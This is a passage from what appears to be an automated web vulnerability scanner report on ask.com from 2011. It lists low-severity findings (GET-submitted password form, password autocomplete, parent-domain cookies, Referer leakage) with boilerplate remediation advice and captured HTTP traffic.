The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

4. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

5. Cookie scoped to parent domain  previous  next
There are 6 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://www.ask.com/about/legal/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllOgpcQKMAAFY@qX8AAAEd
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 46328
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:11 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...

5.2. http://www.ask.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllCApcQXAAAHyEWgcAAABd
from-tr: trafrt002iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77175
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

5.3. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: Tklk8ApcQKMAAFY@f2wAAAEE
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 115264
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:56 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...

5.4. http://www.ask.com/products/display  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllMQpcQKMAAFY@o5AAAAEL
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 39615
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:01 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:01 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

5.5. http://www.ask.com/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

5.6. http://www.ask.com/web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /web

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web?q=xss&search=&qsrc=0&o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.1.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0A42E34A946D4254193520127E77B26A; wz_sid=084EE34C926D4254193520127E77B26A; wz_scnt=1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklkhQpcQDoAAAxvduAAAAL7
from-tr: trafrt010iad.io.askjeeves.info
Content-Length: 109507
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:25:09 GMT
Connection: close
Set-Cookie: gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; Domain=.ask.com; Expires=Wed, 14-Sep-2011 18:25:09 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-eHNz; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI1OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:25:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   

<title>Ask.com - W
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.ask.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllCApcQXAAAHyEWgcAAABd
from-tr: trafrt002iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77175
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</a>


<a href="http://ask.pronto.com/user/search.do?&q=xss" class="txt3" style="color: #0055CC;">Shopping</a>
...[SNIP]...



<a href="http://www.askkids.com?o=0&l=dir"
class="txt3" style="color: #0055CC;">
Kids</a>
...[SNIP]...
<div id="r_t0">
